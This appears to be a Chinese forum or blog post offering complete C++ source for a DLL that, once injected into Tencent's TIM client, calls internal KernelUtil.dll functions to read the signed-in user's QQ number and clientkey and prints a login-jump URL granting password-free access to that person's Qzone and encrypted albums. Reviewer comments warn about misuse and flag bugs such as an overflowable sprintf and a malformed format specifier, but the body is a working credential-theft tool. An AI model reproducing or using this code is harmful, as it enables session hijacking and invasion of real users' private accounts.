之前浏览到论坛上有个帖子,用易语言实现的,我照着思路实现了一个C++版本
编译好DLL,直接注入Tim.exe,使用dbgView等工具查看输出的url,复制到任何一台电脑,使用浏览器打开这个url,就可以不需要密码进入某人的空间,查看加密相册等~ (注意:这个 url 里的 clientkey 等价于一份登录凭据,任何拿到它的人都能以该账号身份访问;它是通过 OutputDebugString 输出的,同一台机器上任何能接收调试输出的进程都可以截获。请只在你有权限测试的账号上使用。)
效果:
复制URL到虚拟机里,直接打开,是已登录状态
DLL源码:
// dllmain.cpp : entry point of the DLL application.
//
// NOTE(review): once injected into Tim.exe this DLL reads the logged-in
// account's QQ number and its "clientkey" through two mangled exports of
// KernelUtil.dll and emits a ptlogin2 "jump" URL via OutputDebugStringA.
// That URL is a credential: whoever obtains it gets the session without a
// password. Use only against accounts you are authorized to test.
#include "pch.h"
#include <stdio.h>
#include <WTypes.h>

// Define CTXStringW as BSTR: a pointer that points just past a 16-byte header,
// with the wide-character payload following it (see AllocTXString).
typedef BSTR CTXStringW;

// Build a CTXStringW-style string from lpSrc and return a pointer to its
// character data (i.e. 16 bytes past the start of the allocation).
//
// Layout written by the memmove calls below: four 32-bit fields
// {0, 3, len, len}, len = wcslen(lpSrc) + 1 (terminator included), then the
// wide-char copy. The meaning of the "0" and "3" fields is not documented
// here; presumably they mirror KernelUtil's internal string header
// (refcount/flags?) -- TODO confirm against the target binary.
//
// Returns NULL when lpSrc is NULL. The buffer is never freed by this code.
// NOTE(review): `new BYTE[...]` throws std::bad_alloc on failure rather than
// returning NULL, so the NULL check after it is only meaningful with a
// nothrow allocator. The size math assumes sizeof(wchar_t) == 2 (Windows).
CTXStringW AllocTXString(const wchar_t* lpSrc)
{
    if (lpSrc == NULL)
        return NULL;
    BYTE* bBuffer = new BYTE[16 + (wcslen(lpSrc) + 1) * 2];
    if (bBuffer == NULL)
        return NULL;
    DWORD dwZero = 0;
    DWORD dwCount = 3;
    DWORD dwLenth = wcslen(lpSrc) + 1;
    memmove(bBuffer + 0 * 4, &dwZero, 4);
    memmove(bBuffer + 1 * 4, &dwCount, 4);
    memmove(bBuffer + 2 * 4, &dwLenth, 4);
    memmove(bBuffer + 3 * 4, &dwLenth, 4);
    wcscpy((wchar_t*)(bBuffer + 4 * 4), lpSrc);
    return CTXStringW(bBuffer + 16);
}

// Locate KernelUtil.dll in the current (injected) process, resolve two of its
// C++-mangled exports, and print a login-jump URL containing the current
// account's uin and clientkey through OutputDebugStringA.
//
// The do { ... } while (0) lets each failed step log a message and `break`
// out. Nothing is returned to the caller; success is visible only in the
// debug output.
VOID Steal()
{
    do
    {
        HMODULE hKernelUtil = GetModuleHandle(L"KernelUtil.dll");
        if (hKernelUtil == NULL)
        {
            OutputDebugStringA("Get KernelUtil Module failed \n");
            break;
        }
        // Mangled name decodes to
        // `unsigned long __cdecl Util::Contact::GetSelfUin(void)`.
        PVOID PtrGetSelfUin = GetProcAddress(hKernelUtil, "?GetSelfUin@Contact@Util@@YAKXZ");
        if (PtrGetSelfUin == NULL)
        {
            OutputDebugStringA("Get GetSelfUin Function failed \n");
            break;
        }
        // NOTE(review): the mangled signature takes no parameters, yet it is
        // called as int(int) with a dummy 1; under __cdecl the caller cleans
        // the stack, so the extra argument is harmless. `uin == NULL`
        // compares an unsigned integer with a null-pointer constant -- it is
        // simply a test for 0.
        DWORD uin = ((int(*)(int))PtrGetSelfUin)(1);
        if (uin == NULL)
        {
            OutputDebugStringA("Invoke GetSelfUin Function failed \n");
            break;
        }
        // Print QQ number as decimal text. %d is used for a DWORD; correct
        // while the value fits a signed int (%u would be the exact match).
        char szUin[MAX_PATH] = { 0 };
        sprintf(szUin, "%d", uin);
        // Mangled name decodes to
        // `class CTXStringW __cdecl Util::Misc::GetSignature(char const *)`,
        // i.e. it returns a CTXStringW by value.
        PVOID GetSignature = GetProcAddress(hKernelUtil, "?GetSignature@Misc@Util@@YA?AVCTXStringW@@PBD@Z");
        if (GetSignature == NULL)
        {
            OutputDebugStringA("Get GetSignature Function failed \n");
            break;
        }
        // An empty CTXStringW whose address is passed as the first argument.
        // Presumably this is the hidden return-slot pointer MSVC uses for a
        // class returned by value, and the callee overwrites ClientKey with
        // the key -- TODO confirm in a disassembler. If so, the buffer from
        // AllocTXString is simply dropped.
        WCHAR wsBuffer[MAX_PATH] = { 0 };
        CTXStringW ClientKey = AllocTXString(wsBuffer);
        PVOID res = ((PVOID(*)(PVOID,const char*))GetSignature)(&ClientKey,"buf32ByteValueAddedSignature");
        if (res == NULL)
        {
            OutputDebugStringA("Invoke GetSignature Function failed \n");
            break;
        }
        // Copy the link below; it enters Qzone without a password.
        // NOTE(review): this assembles a bearer credential into a fixed
        // MAX_PATH (260) byte buffer with unbounded sprintf: the literal text
        // is roughly 120 bytes, plus uin twice and the clientkey, whose
        // length is never checked here -- a long key overflows msg (a
        // bounded formatter would be required). The format also contains
        // "%s%/": "%/" is not a valid conversion specifier, so what is
        // printed after the second uin is undefined. %ws is the MSVC
        // wide-string specifier. OutputDebugStringA hands the URL to any
        // attached debugger or DbgView instance on the host, so the session
        // is exposed to every process that can read the debug channel.
        char msg[MAX_PATH] = { 0 };
        sprintf(msg, "https://ssl.ptlogin2.qq.com/jump?ptlang=2052&clientuin=%s&clientkey=%ws&u1=https://user.qzone.qq.com/%s%/infocenter&source=panelstar\n",szUin,ClientKey,szUin);
        OutputDebugStringA(msg);
    } while (0);
}

// DLL entry point: runs Steal() once, at process attach, and ignores the
// thread/detach notifications.
// NOTE(review): DLL_PROCESS_ATTACH runs under the loader lock; Microsoft
// documents that only a limited set of APIs is safe there. GetModuleHandle /
// GetProcAddress on an already-loaded module and OutputDebugString work in
// practice, but the KernelUtil functions invoked from Steal() may take their
// own locks or load modules, so a deadlock is possible. Returns TRUE
// unconditionally, so the DLL stays loaded even when Steal() fails.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        Steal();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}